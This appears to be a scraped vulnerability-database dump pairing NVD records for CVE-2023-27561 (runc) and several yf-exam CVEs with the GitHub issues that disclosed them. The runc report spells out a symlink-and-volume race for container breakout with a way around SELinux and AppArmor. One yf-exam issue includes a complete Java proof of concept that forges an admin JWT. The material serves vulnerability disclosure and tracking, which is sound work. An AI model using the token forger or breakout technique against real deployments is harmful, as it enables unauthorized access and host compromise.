https://api.github.com/repos/strukturag/libde265/issues/369/comments
5
2022-12-18T10:37:03Z
2023-03-06T17:51:06Z
https://github.com/strukturag/libde265/issues/369
1,501,854,985
369
4,790
CVE-2023-27561
2023-03-03T19:15:11.330
runc through 1.1.4 has Incorrect Access Control leading to Escalation of Privileges, related to libcontainer/rootfs_linux.go. To exploit this, an attacker must be able to spawn two containers with custom volume-mount configurations, and be able to run custom images. NOTE: this issue exists because of a CVE-2019-19921 regression.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "HIGH", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1, "impactScore": 5.9, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://gist.github.com/LiveOverflow/c937820b688922eb127fb760ce06dab9" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/opencontainers/runc/issues/2197#issuecomment-1437617334" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/opencontainers/runc/issues/3751" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2023/03/msg00023.html" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ANUGDBJ7NBUMSUFZUSKU3ZMQYZ2Z3STN/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/DHGVGGMKGZSJ7YO67TGGPFEHBYMS63VF/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FNB2UEDIIJCRQW4WJLZOPQJZXCVSXMLD/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FYVE3GB4OG3BNT5DLQHYO4M5SXX33AQ5/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/I6BF24VCZRFTYBTT3T7HDZUOTKOTNPLZ/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://gist.github.com/LiveOverflow/c937820b688922eb127fb760ce06dab9" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/opencontainers/runc/issues/2197#issuecomment-1437617334" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/opencontainers/runc/issues/3751" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2023/03/msg00023.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ANUGDBJ7NBUMSUFZUSKU3ZMQYZ2Z3STN/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/DHGVGGMKGZSJ7YO67TGGPFEHBYMS63VF/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FNB2UEDIIJCRQW4WJLZOPQJZXCVSXMLD/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FYVE3GB4OG3BNT5DLQHYO4M5SXX33AQ5/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/I6BF24VCZRFTYBTT3T7HDZUOTKOTNPLZ/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://security.netapp.com/advisory/ntap-20241206-0004/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:linuxfoundation:runc:*:*:*:*:*:*:*:*", "matchCriteriaId": "AE0C5D34-F78A-4993-AC70-25A6606FC82B", "versionEndExcluding": "1.1.5", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:redhat:openshift_container_platform:4.0:*:*:*:*:*:*:*", "matchCriteriaId": "932D137F-528B-4526-9A89-CD59FA1AB0FE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "F4CFF558-3C47-480D-A2F0-BABF26042943", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:redhat:enterprise_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "7F6FB57C-2BC7-487C-96DD-132683AEB35D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "706" ]
706
https://github.com/opencontainers/runc/issues/2197#issuecomment-1437617334
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "opencontainers", "runc" ]
Disclosed in https://github.com/opencontainers/runc/pull/2190. Here's the original report to security@opencontainers.org: Hi all, an attacker who controls the container image for two containers that share a volume can race volume mounts during container initialization, by adding a symlink to the rootfs that points to a directory on the volume. The second container won't be able to see the actual mount, but it can race it by modifying the mount point on the volume. This can be exploited for a full container breakout by racing readonly/mask mounts, allowing writes to dangerous paths like `/proc/sys/kernel/core_pattern`. Example: - The rootfs of container A has a symlink `/proc` -> `/evil/level1` - Container A specifies a named volume mounted to `/evil` - Container B, started before container A, shares this named volume and repeatedly swaps `/evil/level1` and `/evil/level1~` - Container A mounts procfs to `/evil/level1~/level2`, but when it remounts `/proc/sys`, it does so at `/evil/level1/level2/sys`. This can reliably be reproduced using runc and podman on Fedora 30 (takes about 0-5s to win the race for me): https://gist.github.com/leoluk/82965ad9df58247202aa0e1878439092 SELinux would ordinarily prevent the exploit by disallowing `container_t` from writing `usermodehelper_t`, but it can be disabled by symlinking `/proc/self/task/1/attr/exec` to something benign like `/proc/self/sched` (bypassing the procfs check). AppArmor can be disabled similarly. Docker specifies the mounts in a different order and mounts procfs after it mounts the volumes, mounting over the /proc symlink, which appears to prevent at least the /proc approach. I haven't tested other runc usage scenarios, for instance, k8s+cri-o might be vulnerable as well. Fabian of Cure53 (in CC) created a minimal PoC that uses runc directly: https://gist.github.com/LiveOverflow/c937820b688922eb127fb760ce06dab9 There are other container init steps after the volume mount that can be raced, obvious ones being utils.CloseExecFrom and the AppArmor/SELinux attrs but there might be others, especially in mountToRootfs (like tricking remount into mounting the rootfs as rshared if there's another volume that specifies the flag, but I haven't tried that). This is similar to the vulnerability I reported that Adam Iwaniuk disclosed during their Dragon Sector CTF (https://github.com/opencontainers/runc/issues/2128) and a similar crun one (https://github.com/containers/crun/issues/111). The fix for the mounts is probably what Aleksa outlined here, using /proc/self/fd to resolve the path: https://github.com/containers/crun/issues/111#issuecomment-536495867
[CVE-2019-19921]: Volume mount race condition with shared mounts
https://api.github.com/repos/opencontainers/runc/issues/2197/comments
12
2020-01-01T13:07:23Z
2023-04-24T11:30:03Z
https://github.com/opencontainers/runc/issues/2197
544,355,271
2,197
4,791
CVE-2023-27561
2023-03-03T19:15:11.330
runc through 1.1.4 has Incorrect Access Control leading to Escalation of Privileges, related to libcontainer/rootfs_linux.go. To exploit this, an attacker must be able to spawn two containers with custom volume-mount configurations, and be able to run custom images. NOTE: this issue exists because of a CVE-2019-19921 regression.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "HIGH", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1, "impactScore": 5.9, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://gist.github.com/LiveOverflow/c937820b688922eb127fb760ce06dab9" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/opencontainers/runc/issues/2197#issuecomment-1437617334" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/opencontainers/runc/issues/3751" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2023/03/msg00023.html" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ANUGDBJ7NBUMSUFZUSKU3ZMQYZ2Z3STN/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/DHGVGGMKGZSJ7YO67TGGPFEHBYMS63VF/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FNB2UEDIIJCRQW4WJLZOPQJZXCVSXMLD/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FYVE3GB4OG3BNT5DLQHYO4M5SXX33AQ5/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/I6BF24VCZRFTYBTT3T7HDZUOTKOTNPLZ/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://gist.github.com/LiveOverflow/c937820b688922eb127fb760ce06dab9" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/opencontainers/runc/issues/2197#issuecomment-1437617334" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/opencontainers/runc/issues/3751" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2023/03/msg00023.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ANUGDBJ7NBUMSUFZUSKU3ZMQYZ2Z3STN/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/DHGVGGMKGZSJ7YO67TGGPFEHBYMS63VF/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FNB2UEDIIJCRQW4WJLZOPQJZXCVSXMLD/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FYVE3GB4OG3BNT5DLQHYO4M5SXX33AQ5/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/I6BF24VCZRFTYBTT3T7HDZUOTKOTNPLZ/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://security.netapp.com/advisory/ntap-20241206-0004/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:linuxfoundation:runc:*:*:*:*:*:*:*:*", "matchCriteriaId": "AE0C5D34-F78A-4993-AC70-25A6606FC82B", "versionEndExcluding": "1.1.5", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:redhat:openshift_container_platform:4.0:*:*:*:*:*:*:*", "matchCriteriaId": "932D137F-528B-4526-9A89-CD59FA1AB0FE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "F4CFF558-3C47-480D-A2F0-BABF26042943", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:redhat:enterprise_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "7F6FB57C-2BC7-487C-96DD-132683AEB35D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "706" ]
706
https://github.com/opencontainers/runc/issues/3751
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "opencontainers", "runc" ]
Hi, I'm part of the Debian Long Term Support (LTS) team, and I'm currently working on an update for package [runc](https://security-tracker.debian.org/tracker/source-package/runc). As explained in https://github.com/opencontainers/runc/issues/2197#issuecomment-1437617334 , while working on fixing CVE-2019-19921, I noticed the fix was apparently broken by the one for CVE-2021-30465 (0ca91f44f1664da834bc61115a849b56d22f595f). I can reproduce the issue with branch `main`, using the [original reproducer](https://gist.github.com/LiveOverflow/c937820b688922eb127fb760ce06dab9) from #2197 (host's `proc/sys/kernel/core_pattern` overwritten from `container-2` after a few tries). Because various GNU/Linux distributions have incorporated the initial fix (or upgraded runc), and marked the security issue "fixed", I would recommend registering a new CVE to indicate that a follow-up fix is needed. Do you confirm? Thanks and best regards.
CVE-2019-19921 re-introduction/regression
https://api.github.com/repos/opencontainers/runc/issues/3751/comments
11
2023-02-24T19:00:12Z
2023-03-25T16:33:47Z
https://github.com/opencontainers/runc/issues/3751
1,599,144,908
3,751
4,792
CVE-2023-25402
2023-03-03T23:15:12.073
CleverStupidDog yf-exam 1.8.0 is vulnerable to File Upload. There is no restriction on the suffix of the uploaded file, resulting in any file upload.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/CleverStupidDog/yf-exam/issues/1" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/Fw-fW-fw/UPDATE-CVE/blob/main/CVE-2023-25402" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/CleverStupidDog/yf-exam/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/Fw-fW-fw/UPDATE-CVE/blob/main/CVE-2023-25402" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:yf-exam_project:yf-exam:1.8.0:*:*:*:*:*:*:*", "matchCriteriaId": "13CA9681-5722-40F8-8836-EB0BFED22182", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "434" ]
434
https://github.com/CleverStupidDog/yf-exam/issues/1
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "CleverStupidDog", "yf-exam" ]
### Description ***yf-exam*** is a multi-role online training and examination system. The system integrates user management, role management, department management, question bank management, test question management, test question import and export, test management, online test, wrong question training and other functions, and the test process is perfect. ***@PostMapping("/common/api/file/upload")*** When this interface is uploaded, there is no restriction on the suffix of the uploaded file, resulting in any file upload. ### Vulnerability details This interface accepts uploaded files, and then submits them to upload() for processing. ``` com.yf.exam.ability.upload.controller#upload() ``` ![image](https://user-images.githubusercontent.com/66824584/216762346-b67d049d-1989-4e49-abbc-af520f7e974c.png) Continue to follow up and come to the implementation class of the upload interface. ``` com.yf.exam.ability.upload.service.impl#upload() ``` ![image](https://user-images.githubusercontent.com/66824584/216762352-d05a73fd-0b8b-4e0f-a1a3-dee7150bbe8a.png) You can see that the incoming files are processed here, continue to follow up ``` com.yf.exam.ability.upload.utils#processPath() ``` ![image](https://user-images.githubusercontent.com/66824584/216762363-54514438-a92b-4bd9-827f-227ab26dab19.png) Then rename the incoming file com.yf.exam.ability.upload.utils#renameFile() ![image](https://user-images.githubusercontent.com/66824584/216762374-b9a4e897-28dc-4bd4-becf-7b642662e902.png) It can be seen that only the suffix name is intercepted, without filtering, it is directly spliced and put backใ€‚ ![image](https://user-images.githubusercontent.com/66824584/216762391-f90382af-a582-4313-817f-066578499944.png) Finally, return directly to the upload path. ### TEST Upload file at routing point ![image](https://user-images.githubusercontent.com/66824584/216762435-7a751d4e-748b-4e76-a476-3e2ffc2fe28c.png) It can be found that the upload was successful ![image](https://user-images.githubusercontent.com/66824584/216762441-457d4ec0-6e7d-4822-8e17-3f782de6ea96.png) Try to access, you can find that the access is successfulใ€‚
File Upload Vulnerability
https://api.github.com/repos/CleverStupidDog/yf-exam/issues/1/comments
1
2023-02-04T10:38:55Z
2023-02-20T10:11:07Z
https://github.com/CleverStupidDog/yf-exam/issues/1
1,570,877,095
1
4,793
CVE-2023-25403
2023-03-03T23:15:12.140
CleverStupidDog yf-exam v 1.8.0 is vulnerable to Authentication Bypass. The program uses a fixed JWT key, and the stored key uses username format characters. Any user who logged in within 24 hours. A token can be forged with his username to bypass authentication.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/CleverStupidDog/yf-exam/issues/2" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/Fw-fW-fw/UPDATE-CVE/blob/main/CVE-2023-25403" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/CleverStupidDog/yf-exam/issues/2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/Fw-fW-fw/UPDATE-CVE/blob/main/CVE-2023-25403" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:yf-exam_project:yf-exam:1.8.0:*:*:*:*:*:*:*", "matchCriteriaId": "13CA9681-5722-40F8-8836-EB0BFED22182", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "639" ]
639
https://github.com/CleverStupidDog/yf-exam/issues/2
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "CleverStupidDog", "yf-exam" ]
### Description ***yf-exam*** is a multi-role online training and examination system. The system integrates functions such as user management, role management, department management, question bank management, test question management, test question import and export, test management, online test, and wrong question training. The process is perfect. The program uses a fixed JWT key, and the stored key uses username format characters. Any user who logged in within 24 hours. A token can be forged with his username to bypass authentication. ### Vulnerability details login ``` com.yf.exam.modules.sys.user.controller#login() ``` ![image](https://user-images.githubusercontent.com/66824584/216808809-1710872b-c4e9-4c32-ba20-3449ab983e49.png) Follow up the interface ``` com.yf.exam.modules.sys.user.service#lgion() ``` ![image](https://user-images.githubusercontent.com/66824584/216808816-e0e5fce8-51b3-4c1f-9c61-a28553dc9fdd.png) View the implementation class of the interface ``` com.yf.exam.modules.sys.user.service.impl#login() ``` ![image](https://user-images.githubusercontent.com/66824584/216808828-3b085704-a64c-47b8-bfec-d2870906c86a.png) First check whether the account exists, then check whether it is disabled, then check whether it is a password, and generate a token after passing. ``` com.yf.exam.modules.sys.user.service.impl#setToken() ``` ![image](https://user-images.githubusercontent.com/66824584/216808836-2de9d5f9-a526-4f5b-8044-13b3d4bfe527.png) You can see that it is generated using jwt. Then fill token, id. ``` com.yf.exam.ability.shiro.jwt#sign() ``` ![image](https://user-images.githubusercontent.com/66824584/216808845-67eb8a59-b7b0-43be-8d50-257f4e96a873.png) Here you can see that the payload is username, data, and the token is valid for 24 hours. jwt-key is encrypted username, follow up. ``` com.yf.exam.ability.shiro.jwt#encryptSecret() ``` ![image](https://user-images.githubusercontent.com/66824584/216808850-572947f1-e2dc-4b4d-9613-0fd03880158b.png) Here you can see that the jwt-key is to take the md5 value twice. The jwt-key is generated based on the user name and remains unchanged for the current month, so it is very easy to forge. ### TEST Simulate admin login at around 13:44 ![image](https://user-images.githubusercontent.com/66824584/216808864-79ae3405-8780-4c50-85ae-a91a30af7f8d.png) Use poc to generate jwt ![image](https://user-images.githubusercontent.com/66824584/216808875-0e37bb01-7571-4ec2-9a66-2094bf622199.png) Import jwt and try to log in ![image](https://user-images.githubusercontent.com/66824584/216808892-8280c71a-3790-448d-8a65-2fdbded64e7c.png) After the import is refreshed, it successfully enters the background. ![image](https://user-images.githubusercontent.com/66824584/216808905-c5deb185-4771-4e2d-928f-5906f6bc1e18.png) poc ```java import java.io.FileNotFoundException; import java.security.MessageDigest; import java.util.Calendar; import java.util.Date; import java.io.FileOutputStream; import java.io.PrintStream; import com.auth0.jwt.JWT; import com.auth0.jwt.algorithms.Algorithm; import com.auth0.jwt.interfaces.DecodedJWT; import com.auth0.jwt.interfaces.JWTVerifier; public class Jwt_Test { private static final long EXPIRE_TIME = 24 * 60 * 60 * 1000; public static String MD5(String str) { try { MessageDigest md = MessageDigest.getInstance("MD5"); byte[] array = md.digest(str.getBytes("UTF-8")); StringBuilder sb = new StringBuilder(); for (byte item : array) { sb.append(Integer.toHexString((item & 0xFF) | 0x100).substring(1, 3)); } return sb.toString(); } catch (Exception e) { return null; } } private static String encryptSecret(String userName) { // ไธ€ไธช็ฎ€ๅ•็š„็™ปๅฝ•่ง„ๅˆ™๏ผŒ็”จๆˆทๅ+ๅฝ“ๅ‰ๆœˆไปฝไธบๅŠ ๅฏ†ไธฒ๏ผŒๆ„ๆ€ๆฏไธชๆœˆไผšๅ˜๏ผŒ่ฆ้‡ๆ–ฐ็™ปๅฝ• // ๅฏ่‡ช่กŒไฟฎๆ”นๆญค่ง„ๅˆ™ Calendar cl = Calendar.getInstance(); cl.setTimeInMillis(System.currentTimeMillis()); StringBuffer sb = new StringBuffer(userName) .append("&") .append(cl.get(Calendar.MONTH)); // ่Žทๅ–MD5 String secret = MD5(sb.toString()); // System.out.println("jwt_key๏ผš" + secret); return MD5(userName + "&" + secret); } public static String sign(String username, long time) { Date date = new Date(time+EXPIRE_TIME); System.out.println("tokenๆœ‰ๆ•ˆๆœŸ:" + date); Algorithm algorithm = Algorithm.HMAC256(encryptSecret(username)); // ้™„ๅธฆusernameไฟกๆฏ System.out.println("jwt-key :"+encryptSecret(username)); return JWT.create() .withClaim("username", username) .withExpiresAt(date).sign(algorithm); } public static void main(String[] args) throws FileNotFoundException { // for (long i = 1675576527000L; i < 1675576827000L; i+=1000) { // String token = sign("admin", i); //ๆฏ็ง’่ฎก็ฎ—ไธ€ๆฌกjwt // System.out.println(token); // } String token = sign("admin", 1675577612169L); System.out.println(token); } } ```
Authentication Bypass vulnerability
https://api.github.com/repos/CleverStupidDog/yf-exam/issues/2/comments
0
2023-02-05T08:24:38Z
2023-02-05T08:24:38Z
https://github.com/CleverStupidDog/yf-exam/issues/2
1,571,310,260
2
4,794
CVE-2023-26779
2023-03-03T23:15:12.520
CleverStupidDog yf-exam v 1.8.0 is vulnerable to Deserialization which can lead to remote code execution (RCE).
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/CleverStupidDog/yf-exam/issues/3" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/Fw-fW-fw/UPDATE-CVE/blob/main/CVE-2023-26779" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/CleverStupidDog/yf-exam/issues/3" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/Fw-fW-fw/UPDATE-CVE/blob/main/CVE-2023-26779" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:yf-exam_project:yf-exam:1.8.0:*:*:*:*:*:*:*", "matchCriteriaId": "13CA9681-5722-40F8-8836-EB0BFED22182", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "502" ]
502
https://github.com/CleverStupidDog/yf-exam/issues/3
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "CleverStupidDog", "yf-exam" ]
